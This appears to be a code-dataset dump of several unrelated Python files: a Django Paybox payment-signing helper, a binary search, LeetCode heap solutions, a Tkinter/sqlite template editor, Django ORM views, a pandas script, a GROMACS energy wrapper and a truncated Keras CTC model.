subscription=False,\n subscription_amount=None,\n nbpaie=None,\n freq=None,\n quand=None,\n delais=None,\n several_payments=False,\n mont1=None,\n date1=None,\n mont2=None,\n date2=None,\n mont3=None,\n date3=None,\n authorize_without_capture=False,\n diff=None,\n paybox_system_standard=False,\n paybox_system_light=False,\n paybox_system_mobile=False,\n secure_3d=False,\n card_verification_browser_redirect_url=None\n ):\n self.production = production\n self.subscription = subscription\n self.several_payments = several_payments\n self.authorize_without_capture = authorize_without_capture\n self.paybox_system_standard = paybox_system_standard,\n self.paybox_system_light = paybox_system_light,\n self.paybox_system_mobile = paybox_system_mobile\n self.secure_3d = secure_3d\n self.card_verification_api_redirect_url = card_verification_browser_redirect_url\n\n if self.production:\n self.action_url = \"https://tpeweb.e-transactions.fr/php/\"\n self.KEY = settings.PAYBOX_PUBLIC_KEY\n else:\n self.action_url = \"https://preprod-tpeweb.e-transactions.fr/php/\"\n self.KEY = settings.PAYBOX_TEST_PUBLIC_KEY\n\n self.SUPPORTED_HASH_ALGORITHMS = [\n \"SHA512\",\n \"SHA224\",\n \"SHA256\",\n \"SHA384\"\n ]\n\n self.REQUIRED = {\n \"PBX_SITE\": settings.PAYBOX_SITE, # SITE NUMBER (given by Paybox)\n \"PBX_RANG\": settings.PAYBOX_RANG, # RANG NUMBER (given by Paybox)\n \"PBX_IDENTIFIANT\": settings.PAYBOX_IDENTIFIANT, # IDENTIFIANT NUMBER (given by Paybox)\n \"PBX_TOTAL\": total, # Total amount of the transaction, in cents\n \"PBX_DEVISE\": devise if devise else \"978\", # Currency of the transaction\n \"PBX_CMD\": cmd, # Transaction reference generated by the ecommerce\n \"PBX_PORTEUR\": porteur, # Customer's email address\n \"PBX_RETOUR\": \"TO:M;RE:R;AU:A;RC:E;SIGN:K\", # List of the variables Paybox must return to the IPN url\n \"PBX_HASH\": hash if hash and hash in self.SUPPORTED_HASH_ALGORITHMS else \"SHA512\", # Hash algorithm used to calculate the Hmac value\n \"PBX_TIME\": time if time else datetime.datetime.utcnow().isoformat(), # Time of the transaction (iso 8601 format)\n }\n\n self.OPTIONAL = {\n \"PBX_REFUSE\": refuse, # url de retour en cas de refus de paiement\n \"PBX_REPONDRE_A\": repondre_a, # url IPN. WARNING. With Trailing slash, otherwise Django 301 to it...\n \"PBX_EFFECTUE\": effectue, # url de retour en cas de succes\n \"PBX_ANNULE\": annule, # url de retour en cas d'abandon\n \"PBX_ATTENTE\": attente, # url de retour en cas d'abandon\n \"PBX_LANGUE\": langue if langue else \"GBR\", # 3 Chars. payment language. GBR for English\n \"PBX_DIFF\": diff\n }\n\n self.SUBSCRIPTION = {\n \"PBX_2MONT\": subscription_amount, # Amount of the next term of payment in cents. 0 takes amount in PBX_TOTAL\n \"PBX_NBPAIE\": nbpaie, # Number of subsequent subscription payments. 0 is never ending\n \"PBX_FREQ\": freq, # Frequency of payments in months\n \"PBX_QUAND\": quand, # Day of month for for the payment to be executed\n \"PBX_DELAIS\": delais, # Number of days to delay before fist payment is executed\n }\n\n self.SEVERAL_PAYMENTS = {\n \"PBX_2MONT1\": mont1,\n \"PBX_DATE1\": date1,\n \"PBX_2MONT2\": mont2,\n \"PBX_DATE2\": date2,\n \"PBX_2MONT3\": mont3,\n \"PBX_DATE3\": date3\n }\n\n self.RESPONSE_CODES = {\n \"00000\": \"Success\",\n \"00001\": \"Connection failed. Make a new attempt at tpeweb1.paybox.com\",\n \"001xx\": \"Payment rejected\",\n \"00003\": \"Paybox error. Make a new attempt at tpeweb1.paybox.com\",\n \"00004\": \"Card number invalid\",\n \"00006\": \"site, rang, or identifiant invalid. Connection rejected\",\n \"00008\": \"Card expiration date invalid\",\n \"00009\": \"Error while creating a subscription\",\n \"00010\": \"Unrecognized currency\",\n \"00011\": \"Incorrect amount\",\n \"00015\": \"Payment already done\",\n \"00016\": \"Subscriber already known\",\n \"00021\": \"Unauthorized card\",\n \"00029\": \"Incorrect card number\",\n \"00030\": \"Time out\",\n \"00031\": \"Reserved\",\n \"00032\": \"Reserved\",\n \"00033\": \"Country not supported\",\n \"00040\": \"3DSecure validation failed\",\n \"99999\": \"Payment on hold\",\n }\n\n self.PAYBOX_SYSTEM_MODES = [\n \"paybox_system_standard\",\n \"paybox_system_light\",\n \"paybox_system_mobile\"\n ]\n\n def payment_mode(self):\n try:\n if settings.PAYBOX_SYSTEM_MODE:\n if settings.PAYBOX_SYSTEM_MODE in self.PAYBOX_SYSTEM_MODES:\n return settings.PAYBOX_SYSTEM_MODE\n else:\n if self.paybox_system_mobile:\n return \"paybox_system_mobile\"\n elif self.paybox_system_light:\n return \"paybox_system_light\"\n else:\n return \"paybox_system_standard\"\n except AttributeError:\n return \"paybox_system_standard\"\n\n def endpoint_url(self):\n payment_mode = self.payment_mode()\n if payment_mode == \"paybox_system_mobile\":\n if self.production:\n main_url = \"https://tpeweb.paybox.com/cgi/ChoixPaiementMobile.cgi\"\n backup_url = \"https://tpeweb1.paybox.com/cgi/ChoixPaiementMobile.cgi\"\n request = requests.get(main_url)\n if request.status_code == 200:\n return main_url\n else:\n request = requests.get(backup_url)\n if request.status_code == 200:\n return backup_url\n else:\n return \"https://preprod-tpeweb.paybox.com/cgi/ChoixPaiementMobile.cgi\"\n elif payment_mode == \"paybox_system_light\":\n if self.production:\n main_url = \"https://tpeweb.paybox.com/cgi/MYframepagepaiement_ip.cgi\"\n backup_url = \"https://tpeweb1.paybox.com/cgi/MYframepagepaiement_ip.cgi\"\n request = requests.get(main_url)\n if request.status_code == 200:\n return main_url\n else:\n request = requests.get(backup_url)\n if request.status_code == 200:\n return backup_url\n else:\n return \"https://preprod-tpeweb.paybox.com/cgi/MYframepagepaiement_ip.cgi\"\n else:\n if self.production:\n main_url = \"https://tpeweb.paybox.com/cgi/MYchoix_pagepaiement.cgi\"\n backup_url = \"https://tpeweb1.paybox.com/cgi/MYchoix_pagepaiement.cgi\"\n request = requests.get(main_url)\n if request.status_code == 200:\n return main_url\n else:\n request = requests.get(backup_url)\n if request.status_code == 200:\n return backup_url\n else:\n return \"https://preprod-tpeweb.paybox.com/cgi/MYchoix_pagepaiement.cgi\"\n\n def remote_mpi_url(self):\n if self.production:\n mpi_url1 = \"https://tpeweb.paybox.com/cgi/RemoteMPI.cgi\"\n mpi_url2 = \"https://tpeweb1.paybox.com/cgi/RemoteMPI.cgi\"\n mpi_url3 = \"https://tpeweb1.paybox.com/cgi/RemoteMPI.cgi\"\n mpi_url4 = \"https://tpeweb0.paybox.com/cgi/RemoteMPI.cgi\"\n request = requests.get(mpi_url1)\n if request.status_code == 200:\n return mpi_url1\n else:\n request = requests.get(mpi_url2)\n if request.status_code == 200:\n return mpi_url2\n else:\n request = requests.get(mpi_url3)\n if request.status_code == 200:\n return mpi_url3\n else:\n request = requests.get(mpi_url4)\n if request.status_code == 200:\n return mpi_url4\n else:\n remote_mpi_url = \"https://preprod-tpeweb.paybox.com/cgi/RemoteMPI.cgi\"\n return remote_mpi_url\n raise PayboxEndpointException(message=\"Paybox MPI URL is not responsive.\")\n\n def remote_mpi_authenticate(self, session_id):\n \"\"\"\n To carry out a 3D-Secure transaction, merchants will need to authenticate the cardholder before\n calling Paybox Direct Applications\n :return: {\"ID3D\": \"\", \"StatusPBX\": \"\", \"Check\": \"\", \"IdSession\": \"\", \"3DCAVV\": \"\",\n \"3DCAVVALGO\": \"\", \"3DECI\": \"\", \"3DENROLLED\": \"\", \"3DERROR\": \"\", \"3DSIGNVAL\": \"\",\n \"3DSTATUS\": \"\", \"3DXID\": \"\", \"Check\": \"\"}\n \"\"\"\n card_verification_params = {\n \"IdSession\": session_id,\n \"IdMerchant\": settings.PAYBOX_IDENTIFIANT,\n \"URLRetour\": self.card_verification_api_redirect_url,\n \"Amount\": self.REQUIRED['MONTANT'],\n \"Currency\": self.REQUIRED['DEVISE'],\n \"CCExpDate\": self.REQUIRED['DATEVAL'],\n \"CCNumber\": self.REQUIRED['PORTEUR'],\n \"CVVCode\": self.OPTIONAL['CVV']\n }\n remote_mpi_call = requests.post(self.remote_mpi_url(), data=card_verification_params)\n return remote_mpi_call.text\n\n def post_to_paybox(self):\n \"\"\"\n Returns the Paybox action url, required request variables, and the\n optional variables\n :return: {\n \"action\": self.action_url,\n \"required\": self.required,\n \"optional\": self.optional,\n }\n \"\"\"\n if self.secure_3d:\n if self.id3d is None:\n raise InvalidParametersException(message=\"3D Secure payments require mpi authentication.\")\n if self.REQUIRED[\"PBX_HASH\"] not in self.SUPPORTED_HASH_ALGORITHMS:\n raise InvalidParametersException(message=\"Unsupported hash algorithm provided.\")\n self.REQUIRED[\"PBX_DEVISE\"] = self.REQUIRED.get(\"devise\", \"978\")\n if self.authorize_without_capture:\n self.OPTIONAL[\"PBX_AUTOSEULE\"] = 'O'\n # string to sign. Made of the required variables in a precise order.\n tosign = (\n \"PBX_SITE=%(PBX_SITE)s&PBX_RANG=%(PBX_RANG)s&PBX_IDENTIFIANT=%(PBX_IDENTIFIANT)s&PBX_TOTAL=%(PBX_TOTAL)s&PBX_DEVISE=%(PBX_DEVISE)s&PBX_CMD=%(PBX_CMD)s&PBX_PORTEUR=%(PBX_PORTEUR)s&PBX_RETOUR=%(PBX_RETOUR)s&PBX_HASH=%(PBX_HASH)s&PBX_TIME=%(PBX_TIME)s\"\n % self.REQUIRED\n )\n # Subscription variables\n if self.subscription:\n for key, value in self.SUBSCRIPTION.items():\n if value:\n tosign += \"&\" + key + \"=\" + value\n # Several payments\n if self.several_payments:\n for key, value in self.SEVERAL_PAYMENTS.items():\n if value:\n tosign += \"&\" + key + \"=\" + value\n # Optional variables\n for key, value in self.OPTIONAL.items():\n if value:\n tosign += \"&\" + key + \"=\" + value\n\n binary_key = binascii.unhexlify(self.KEY)\n algorithms = {\n \"SHA512\": hashlib.sha512,\n \"SHA224\": hashlib.sha224,\n \"SHA256\": hashlib.sha256,\n \"SHA384\": hashlib.sha384\n }\n chosen_algorithm = algorithms.get(self.REQUIRED['PBX_HASH'])\n signature = (\n hmac.new(binary_key, tosign.encode(\"ascii\"), chosen_algorithm)\n .hexdigest()\n .upper()\n )\n self.REQUIRED[\"hmac\"] = signature\n\n return {\n \"action\": self.endpoint_url(),\n \"required\": self.REQUIRED,\n \"optional\": self.OPTIONAL,\n }\n\n def construct_html_form(self):\n \"\"\" Returns an html form ready to be used (string)\n \"\"\"\n subscription_fields = \"\\n\".join(\n [\n \"\".format(\n field, self.SUBSCRIPTION[field]\n )\n for field in self.SUBSCRIPTION\n if self.SUBSCRIPTION[field]\n ]\n )\n\n optional_fields = \"\\n\".join(\n [\n \"\".format(\n field, self.OPTIONAL[field]\n )\n for field in self.OPTIONAL\n if self.OPTIONAL[field]\n ]\n )\n\n html = \"\"\"
\n \n \n \n \n \n \n \n \n \n \n \n {subscription}\n {optional}\n \n
\"\"\"\n\n return html.format(\n action=self.endpoint_url(), required=self.REQUIRED, optional=optional_fields,\n subscription=subscription_fields\n )\n\n def verify_ipn(self, response_url, total, verify_certificate=True):\n \"\"\" Verifies the notification sent by Paybox to your server.\n It verifies :\n - the authenticity of the message\n - the fact that the message has not been altered\n - if not in production, the auth_number must be \"XXXXXX\"\n - if in production, there must be a Response Code\n - the total returned must be equal to the total of the order you've saved in ddb\n :response_url: (string), the full response url with its encoded args\n :order_total': (int), the total amount required\n :verify_certificate: (bool)\n It returns a dict which contains three variables:\n - success, (bool) True if the payment is valid\n - status, (str) The Paybox Response Code\n - auth_code, (str) The Authorization Code generated by the Authorization Center\n \"\"\"\n\n url_parsed = urlparse(response_url)\n message = url_parsed.query\n query = parse_qs(message)\n\n if verify_certificate:\n self.verify_certificate(message=message, signature=query[\"SIGN\"][0])\n\n if not self.production:\n assert query[\"AU\"][0] == \"XXXXXX\", \"Incorrect Test Authorization Code\"\n else:\n assert \"RC\" in query, \"No Response Code Returned\"\n\n assert query[\"TO\"][0] == str(\n total\n ), \"Total does not match. PBX: %s - CMD: %s\" % (\n query[\"TO\"][0],\n str(total),\n )\n\n return {\n \"success\": True if query[\"RC\"][0] == \"00000\" else False,\n \"status\": self.RESPONSE_CODES.get(\n query[\"RC\"][0][:-2] + \"xx\",\n self.RESPONSE_CODES.get(query[\"RC\"][0], \"Unrecognized Response Code\"),\n ),\n \"auth_code\": query[\"AU\"][0] if \"AU\" in query else False,\n }\n\n def verify_certificate(self, message, signature):\n \"\"\" Verifies the Paybox certificate, authenticity and alteration.\n If everything goes well, returns True. Otherwise raise an Error\n :message: (str), the full url with its args\n :signature: (str), the signature of the message, separated from the url\n Flow:\n - The signature is decoded base64\n - The signature is removed from the message\n - The Paybox pubkey is loaded from an external file\n - it's validity is checked\n - The message is digested by SHA1\n - The SHA1 message is verified against the binary signature\n \"\"\"\n\n # detach the signature from the message\n message_without_sign = message.split(\"&SIGN=\")[0]\n # decode base64 the signature\n binary_signature = base64.b64decode(signature)\n # create a pubkey object\n if self.production:\n key = RSA.importKey(\n settings.PAYBOX_PUBLIC_KEY\n )\n else:\n key = RSA.importKey(\n settings.PAYBOX_TEST_PUBLIC_KEY if settings.PAYBOX_TEST_PUBLIC_KEY else \"0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF\"\n )\n # digest the message\n h = SHA.new(bytes(message_without_sign, encoding=\"utf8\"))\n # and verify the signature\n verifier = PKCS1_v1_5.new(key)\n assert verifier.verify(h, binary_signature), \"Signature Verification Failed\"\n\n return True\n\n","sub_path":"example_paybox/paybox_test/paybox_system.py","file_name":"paybox_system.py","file_ext":"py","file_size_in_byte":18832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"399299019","text":"def binary_search(sequence, target):\n sequence = sorted(sequence)\n\n left = 0\n right = len(sequence)\n\n while left <= right:\n middle = (left + right) // 2\n if sequence[middle] < target:\n left = middle + 1\n elif sequence[middle] > target:\n right = middle - 1\n else:\n return middle\n return None\n\n\nif __name__ == \"__main__\":\n PRIMES = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61]\n res = binary_search(PRIMES, 59)\n print(res)","sub_path":"40/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"241836145","text":"import math\nimport heapq\nfrom queue import PriorityQueue\nfrom typing import List\n\n#超时的主要原因是对所有元素进行排序了,实际上不用把所有元素都排序\n#最小值一定是[1,1]位置的两个,第二,三小值则在[1,2],[2,1]中选择,第四五六则在[1,3],[2,2],[3,1]中选择,所以选择大概一个左上三角的位置(k*k)就可以得到前k个值\n#每次一行入队列:第一次[1,1],...,[1,k]第二次[2,1],...,[2,k-1]每次入的行都是升序的,不需要排序,减少了队列内排序时间\n\n\ndef takesecond(elem):\n return elem[1]\n\n\nclass Solution:\n def kSmallestPairs(self, nums1: List[int], nums2: List[int], k: int) -> List[List[int]]:\n n1 = len(nums1)\n n2 = len(nums2)\n#默认的是升序\n pq = PriorityQueue()\n ans = []\n z=1\n for i in range(n1):\n for j in range(n2):\n pq.put((nums1[i]+nums2[j],z))\n z+=1\n\n if(k>z-1):\n k=z-1 #z最后又加了一次\n for i in range(k):\n tuple = pq.get()\n serial = float(tuple[1])\n t1 = math.ceil( serial/n2 )\n t2 = int(serial)-(t1-1)*n2\n ans.append([nums1[t1-1],nums2[t2-1]])\n\n return ans\n\n def optimize(self, nums1: List[int], nums2: List[int], k: int) -> List[List[int]]:\n n1 = len(nums1)\n n2 = len(nums2)\n pq = PriorityQueue()\n ans = []\n for j in range(min(k,n2)):\n pq.put((nums1[0]+nums2[j],0,j))\n while pq and len(ans) List[List[int]]:\n m, n = len(nums1), len(nums2)\n ans = []\n pq = [(nums1[i] + nums2[0], i, 0) for i in range(min(k, m))]\n while pq and len(ans) < k:\n _, i, j = heappop(pq)\n ans.append([nums1[i], nums2[j]])\n if j + 1 < n:\n heappush(pq, (nums1[i] + nums2[j + 1], i, j + 1))\n return ans\n\"\"\"","sub_path":"373. 查找和最小的 K 对数字/优先队列.py","file_name":"优先队列.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"414837734","text":"import os\nfrom tkinter import *\nfrom tkinter.ttk import *\nfrom tkinter import filedialog\nfrom sqlite3 import connect,Connection\nimport re\nimport string\n\ndemo_template_txt = \"\"\" This is the demo template.\nIn the data of a template, tokens for replacement are indicated \nusing first the dollar sign then curly braces surrounding an identifier.\n\n${like} ${this}.\n\n$${BUT} $not_in any of $$these_ways.\n\nIdentifiers are case sensitive, thus ${this} is different from ${THIS}.\n\nSwitch to the 'Entry' tab to enter values for the replacement of the tokens.\nUpon entering the replacement values, output is displayed in the bottom area.\nYou may copy it to the clipboard or save it as a file.\nIf entry named 'demo.template' is found in the database,\nthen it's data will be loaded at start.\nThe database file, which is created in the user's home folder,\nis named '.tktem.sqlitedb' on unixlike os\nor named '_tktem.sqlitedb' on windows os.\nYou may edit this template data and press the 'Save Template' button below.\nYou may import a template using the 'Template' menu above.\nYou may select from templates in the database using the combobox above.\nTo create a new template, enter a name into the combobox above\nand press return.\nRemember to press the 'Save Template' button when you are done editing\na template!\"\"\"\n\nclass Db(Connection):\n def __init__(self,name,**kw):\n pfix = '.'\n if os.sys.platform == 'win32':\n pfix = '_'\n dbname = os.path.join(os.path.expanduser('~'),pfix+\"tktem1.sqlitedb\")\n Connection.__init__(self,dbname,**kw)\n made = self.execute('select count(*) from sqlite_master').fetchone()[0]\n if not made:\n self.executescript('''\n create table if not exists templates (\n name, data default \"\",\n unique (name) on conflict ignore);''')\n self.commit()\n ct = self.execute('select count(*) from templates').fetchone()[0]\n if not ct:\n self.execute(\"insert into templates(name,data) values (?,?)\",(\"demo.template\",demo_template_txt))\n self.commit()\n\n\nclass Data:\n def __init__(self):\n self.template_name = StringVar()\n self.template_data = StringVar()\n self.output_data = StringVar()\n self.active_template = StringVar()\n self.entrydict = dict()\n\n\nclass Win(Tk):\n\n def __init__(self,master=None):\n Tk.__init__(self,master)\n self.cx = connect('the_database',factory=Db)\n self.data = Data()\n self.data.template_name.trace('w',self.template_name_change)\n self.data.template_data.trace('w',self.template_data_change)\n self.data.active_template.trace('w',self.active_template_change)\n self.createwidgets()\n self.data.template_name.set(\"demo.template\")\n self.window_setup()\n\n def createwidgets(self):\n self.head = Frame(self)\n self.tname = Label(self.head,textvariable=self.data.template_name)\n self.template_selector = Combobox(self.head, textvariable=self.data.active_template, postcommand=self.populate_tlist)\n self.body = LabelFrame(self,labelwidget=self.head)\n self.nbook = Notebook(self.body)\n self.nbtab1 = Frame(self.nbook)\n self.nbtab2 = Frame(self.nbook)\n self.nbook.insert(END,self.nbtab1,text='Template')\n self.nbook.insert(END,self.nbtab2,text='Entry')\n self.tframe = Frame(self.nbtab1)\n self.entry = Frame(self.nbtab2)\n self.datatext = Text(self.tframe)\n self.tdata_save = Button(self.tframe,text=\"Save Template\",command=self.save_tdata)\n self.odata_save = Button(self,text=\"Save Output\",command=self.save_output_data)\n self.oframe = Frame(self.body)\n self.odata_copy = Button(self.oframe,text=\"Copy to Clipboard\",command=self.copy_output_to_clipboard)\n self.output = LabelFrame(self.oframe,labelwidget=self.odata_save,labelanchor=SE)\n self.odata = Message(self.output,textvariable=self.data.output_data)\n self.body.pack(anchor=N,expand=True,fill=BOTH)\n self.template_selector.pack(side=LEFT)\n self.tname.pack(side=LEFT,pady=4)\n self.nbook.pack(anchor=N,expand=True,fill=BOTH)\n self.tframe.pack()\n self.datatext.pack()\n self.tdata_save.pack()\n self.entry.pack()\n self.oframe.pack(anchor=N,expand=True,fill=BOTH)\n self.odata_copy.pack()\n self.output.pack()\n self.odata.pack()\n self.nbook.bind('<>',self.nbook_tabchange)\n self.template_selector.bind('',self.refocus)\n #self.codeinspect_btn = Button(self,command=self.codeinspect)\n #self.codeinspect_btn.pack()\n\n #def codeinspect(self):\n # __import__('code').interact(local=dict(globals(), **locals()))\n\n def nbook_tabchange(self,e):\n self.update_output_data()\n\n def save_output_data(self):\n svfile = filedialog.asksaveasfilename(initialdir=os.path.expanduser(\"~\"))\n if svfile:\n odata = self.data.output_data.get().rstrip()\n with open(svfile,'w') as f:\n f.write(odata)\n print('saved to',svfile)\n\n def window_setup(self):\n w,h = self.winfo_screenwidth(),self.winfo_screenheight()\n self.geometry('%ix%i+%i+%i'%(w/2,h-84,(w/4),42))\n self.configure(padx=20,pady=20,border=0)\n self.deiconify()\n self.lift()\n self.call('wm', 'attributes', '.', '-topmost', True)\n self.after_idle(self.call,'wm','attributes','.','-topmost',False)\n if os.sys.platform == 'darwin':\n os.system(\"/usr/bin/osascript -e 'tell application \\\"Finder\\\"'\" +\n \" -e 'set frontmost of process \\\"Python\\\" to true'\" +\n \" -e 'end tell'\")\n\n def populate_tlist(self):\n tlist = [t[0] for t in self.cx.execute('select name from templates')]\n self.template_selector.config(values=tlist)\n\n def refocus(self,*a):\n self.head.focus()\n t = self.data.active_template.get()\n v = self.template_selector.config('values')[4]\n if len(t) and t not in v:\n self.cx.execute('insert into templates (name) values (?)',(t,))\n self.data.template_name.set(t)\n\n def copy_output_to_clipboard(self):\n odata = self.data.output_data.get().rstrip()\n self.clipboard_clear()\n self.clipboard_append(odata)\n\n def save_tdata(self):\n datatext = self.datatext.get('1.0',END)\n tname = self.data.template_name.get()\n self.cx.execute('update templates set data=? where name=?',(datatext,tname))\n self.cx.commit()\n\n def update_output_data(self):\n d = dict()\n datatext = self.datatext.get('1.0',END)\n matchls = list(re.findall(string.Template.pattern,datatext))\n braceds = set()\n for one,two,braced,four in matchls:\n if braced not in {'$',''}:\n braceds.add(braced)\n for m in sorted(braceds):\n if m not in self.data.entrydict:\n e_var = StringVar()\n e_var.trace('w',self.entry_keypress_update)\n entrylabel = Label(self.entry,text=m)\n entry = Entry(self.entry,textvariable=e_var)\n self.data.entrydict[m] = {\"ev\":e_var,\"en\":entry,\"el\":entrylabel}\n d[m] = self.data.entrydict[m][\"ev\"].get()\n dvn = [vn for vn in self.data.entrydict if vn not in braceds]\n for vn in dvn:\n dv = self.data.entrydict[vn]\n for dvt in ['el','en']:\n dv[dvt].destroy()\n del self.data.entrydict[vn]\n for i,e in enumerate(sorted(self.data.entrydict)):\n self.data.entrydict[e]['el'].grid(row=i,column=0,sticky=E+W,padx=4,pady=1,ipadx=4,ipady=1)\n self.data.entrydict[e]['en'].grid(row=i,column=1,sticky=E+W,padx=2,pady=2,ipadx=2,ipady=2)\n self.data.output_data.set(string.Template(datatext).safe_substitute(**d))\n\n def entry_keypress_update(self,*e):\n self.update_output_data()\n\n def template_data_change(self,*a):\n self.datatext.delete('1.0',END)\n tdata = self.data.template_data.get()\n self.datatext.insert('1.0',tdata.rstrip())\n self.update_output_data()\n\n def template_name_change(self,*a):\n tname = self.data.template_name.get()\n self.title(tname)\n data = self.cx.execute('select data from templates where name=?',(tname,)).fetchone()[0]\n self.data.template_data.set(data)\n at = self.data.active_template.get()\n if at != tname:\n self.data.active_template.set(tname)\n\n def active_template_change(self,*a):\n t = self.data.active_template.get()\n if t in self.template_selector.config('values')[4]:\n ot = self.data.template_name.get()\n if t != ot:\n self.data.template_name.set(t)\n return True\n\nwin = Win()\ns = Style()\ncomd = dict(borderwidth=2,ipadx=10,ipady=10,padx=10,pady=10)\ns.configure('TFrame',**comd)\ns.configure('TLabelFrame',**comd)\ns.configure('TNotebook',**comd)\nwin.mainloop()\n","sub_path":"tktem.py","file_name":"tktem.py","file_ext":"py","file_size_in_byte":9100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"319648086","text":"from django.shortcuts import render, HttpResponseRedirect\nfrom demo.models import Department, Employee\nfrom demo.orm_forms import AddDeptForm, AddEmpForm\n\n\ndef list_emp(request):\n emps = Employee.objects.all()\n return render(request, 'demo/orm/list_emp.html', {\"emps\": emps})\n\n\ndef emp_by_dept(request, id):\n emps = Employee.objects.filter(department=id)\n return render(request, 'demo/orm/list_emp.html', {\"emps\": emps})\n\n\ndef add_emp(request):\n if request.method == \"POST\":\n form = AddEmpForm(request.POST)\n if form.is_valid():\n form.save() # insert row into Employees table\n return HttpResponseRedirect(\"/demo/orm/home\")\n else:\n form = AddEmpForm()\n\n return render(request, 'demo/orm/add_emp.html', {\"form\": form})\n\n\ndef add_dept(request):\n if request.method == \"POST\":\n form = AddDeptForm(request.POST)\n if form.is_valid():\n form.save() # insert row into Departments table\n return HttpResponseRedirect(\"/demo/orm/home\")\n else:\n form = AddDeptForm()\n\n return render(request, 'demo/orm/add_dept.html', {\"form\": form})\n\n\ndef home(request):\n dept_count = Department.objects.count()\n emp_count = Employee.objects.count()\n return render(request, 'demo/orm/home.html',\n {\"dept_count\": dept_count,\n \"emp_count\": emp_count})\n\n\ndef list_dept(request):\n depts = Department.objects.all()\n return render(request, 'demo/orm/list_dept.html', {\"depts\": depts})\n","sub_path":"demo/orm_views.py","file_name":"orm_views.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"289126701","text":"import pandas as pd \n\ndf = pd.read_csv(\"./wikivoyage-listings-en.csv\")\n\ncities = {}\n\nfor a in df['article']:\n\tif a in cities.keys():\n\t\tcontinue\n\tcities[a] = 1\n\ndistribution = {}\nfor t in df['type']:\n\tif t not in distribution.keys():\n\t\tdistribution[t] = 1\n\tdistribution[t] += 1\n\ndef get_data_by_city(city, df):\n\tstart_index = 0\n\tend_index = 0\n\tfound = False\n\tfor i,a in enumerate(df['article']):\n\t\tif city.lower() in a.lower() and not found:\n\t\t\tstart_index = i\n\t\t\tfound = True\n\t\tif found and city.lower() not in a.lower():\n\t\t\tend_index = i\n\t\t\tbreak\n\treturn df[start_index:end_index]\n\ndef slice_by_type(place_type, df):\n\ttype_df = df[df['type'] == place_type]\n\treturn type_df\n\nprint(distribution)\nny = get_data_by_city('detroit', df)\nprint(ny.shape)\nne = slice_by_type('drink', ny)\nprint(ne.shape)\n","sub_path":"explore.py","file_name":"explore.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"520201219","text":"#!/usr/bin/env python3\n# coding=utf-8\n\nimport os, sys\nimport subprocess\nfrom subprocess import Popen, PIPE\n\ncmd = 'gmx -quiet -nobackup energy -f %s -b %s' % (sys.argv[1], sys.argv[3])\n\nprop_str = sys.argv[2]\nsp = Popen(cmd.split(), stdout=PIPE, stdin=PIPE, stderr=PIPE)\nsp_out = sp.communicate(input=prop_str.encode())[0]\n\nfor line in sp_out.decode().splitlines():\n if line.lower().startswith(prop_str.lower()):\n words = line.split()\n ave = float(words[1])\n stderr = float(words[2])\n\nif prop_str.lower().startswith('#sur'):\n ave /= 20\n stderr /= 20\n\nif prop_str.lower().startswith('dens'):\n ave /= 1000\n stderr /= 1000\n\nprint(ave, stderr)\n\n","sub_path":"scripts/gmx-get-property.py","file_name":"gmx-get-property.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"419874464","text":"\nfrom keras import backend as K\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\nfrom keras.layers import Input, Dense, Activation\nfrom keras.layers import Reshape, Lambda\nfrom keras.layers import Dropout\nfrom keras.layers.merge import add, concatenate\nfrom keras.models import Model\nfrom keras.layers.recurrent import GRU\nfrom keras.optimizers import SGD\nimport keras.callbacks\nimport ctc_drop_first_2\n\n\ndef make_model(img_w, img_h, output_size, absolute_max_string_len):\n\n # Network parameters\n conv_filters = 16\n #conv_filters = 32 # experiment 2\n kernel_size = (3, 3)\n time_dense_size = 32\n rnn_size = 512\n pool_size = 2\n\n if K.image_data_format() == 'channels_first':\n input_shape = (1, img_w, img_h)\n else:\n input_shape = (img_w, img_h, 1)\n\n act = 'relu'\n input_data = Input(name='the_input', shape=input_shape, dtype='float32')\n type_of_model = \"original\" # \"https://keras.io/examples/mnist_cnn/\"\n if type_of_model == \"https://keras.io/examples/mnist_cnn/\":\n inner = Conv2D(32, kernel_size, padding='same',\n activation=act, kernel_initializer='he_normal',\n name='conv1')(input_data)\n inner = MaxPooling2D(pool_size=(pool_size, pool_size), name='max1')(inner)\n inner = Conv2D(64, kernel_size, padding='same',\n activation=act, kernel_initializer='he_normal',\n name='conv2')(inner)\n inner = MaxPooling2D(pool_size=(pool_size, pool_size), name='max2')(inner)\n inner = Dropout(0.25)(inner) # Fraction of the input units to drop\n conv_filters = 64\n else:\n inner = Conv2D(conv_filters, kernel_size, padding='same',\n activation=act, kernel_initializer='he_normal',\n name='afilter'+str(conv_filters))(input_data)\n inner = MaxPooling2D(pool_size=(pool_size, pool_size), name='apool'+str(pool_size)+\"by\"+str(pool_size))(inner)\n inner = Conv2D(conv_filters, kernel_size, padding='same',\n activation=act, kernel_initializer='he_normal',\n name='bfilter'+str(conv_filters))(inner)\n inner = MaxPooling2D(pool_size=(pool_size, pool_size), name='bpool'+str(pool_size)+\"by\"+str(pool_size))(inner)\n # experiment 3b ... add dropout\n #inner = Dropout(0.5)(inner) # Fraction of the input units to drop\n # experiment 3c ... add dropout\n inner = Dropout(0.25)(inner) # Fraction of the input units to drop\n\n # image is down sampled by MaxPooling twice, hence pool_size ** 2\n conv_to_rnn_dims = (img_w // (pool_size ** 2), (img_h // (pool_size ** 2)) * conv_filters)\n inner = Reshape(target_shape=conv_to_rnn_dims, name='reshape')(inner)\n\n # cuts down input size going into RNN:\n # 